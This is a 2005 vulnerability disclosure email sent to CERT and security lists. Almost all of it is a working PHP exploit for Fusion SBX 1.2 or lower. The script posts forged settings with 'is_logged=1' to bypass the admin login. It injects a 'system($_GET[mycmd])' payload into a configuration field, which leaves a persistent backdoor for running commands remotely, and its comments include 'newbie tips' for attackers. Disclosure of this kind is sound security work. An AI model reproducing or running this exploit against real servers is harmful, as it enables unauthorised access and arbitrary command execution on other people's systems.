From: Dave <dave(at)kidindustries.net>
To: cert(at)cert.org
Cc: moderators(at)osvdb.org, news(at)securiteam.com
Date: Wed, 4 May 2005 23:03:22 -0500
Subject: Fusion SBX 1.2 password bypass and remote command execution

<?
/*
 * Fusion SBX <= 1.2 admin panel login bypass and remote-command execution exploit
 * Exploit discovered 2005-5-2 in about 10 minutes of code lookover for login
 * without proper details, then fooled around and found this nice remote command
 * execution bug with it.
 *
 * This code will open a backdoor on the requested site running Fusion SBX 1.2 or
 * lower, so you can just call www.site.com/sbx/index.php?mycmd=id or something.
 * Newbie tip: Look in the source code after loading an attacked page for a
 * properly-formatted command result that isn't all just stuffed on one line.
 *
 * When you execute commands using this bug, it'll give some error about headers
 * already sent, but that's ok.  Hacking is sometimes messy.
 *
 * irc.kidindustries.net #main
 * dave {AT] kidindustries !DOT% net
 *
 * They call me Davus...  Also known as Kidiot or ¿Hook?
 * NOT Dedicated to the Habbo kiddies...  OK, maybe some of 'em.  ;)
 * Greets to Sirak, Ed, Pyxsul, and remember... CHRISSY > YOU
 */

$host = "localhost";
$path = "/sbx/admin/";            // Starting and trailing slash needed
(/sbx/admin/ and such)

echo "[+] URL: http://$host$path\n";

$post =
"set2=basic&admin_set2=standard&lang2=english&plimit2=10&noname2=Guest&refre
sh2=120&maxname2=30%3B%40system%28%24_GET%5Bmycmd%5D%29&maxmess2=120&maxlink
2=120&wordbanning2=1&maxword2=20&wrapstat2=1&postorder2=1&setsubmit=Commit+C
hanges&is_logged=1";
// Didn't trim up $post from useless variables such as the submit button,
but whatever.

$req  = "POST $path?settings HTTP/1.0\r\n";
$req .= "Host: $host\r\n";
$req .= "Connection: close\r\n";
$req .= "Content-Type: application/x-www-form-urlencoded\r\n";
$req .= "Content-Length: ".strlen($post)."\r\n\r\n";

$req .= $post;

echo "[+] Request built, using:\n$post\nas post data\n";

if($sck = fsockopen($host, 80)) {
echo "[+] Connected, sending request\n";
fwrite($sck, $req);
echo "[+] Request dumped to server!\n\n\n\n";
 // $reply = fread($sck, 1048576); // A megabyte is MORE than enough.
 // echo "[~] Server replied:\n$reply\n";
 // Eh, uncomment if you wish, I just had to debug this script a bit.
fclose($sck);
echo "Now try http://$host$path?mycmd=id to see if exploit was
successful...\n";
}
else {
echo "[-] Connection failed!\n";
exit(-1); }
?>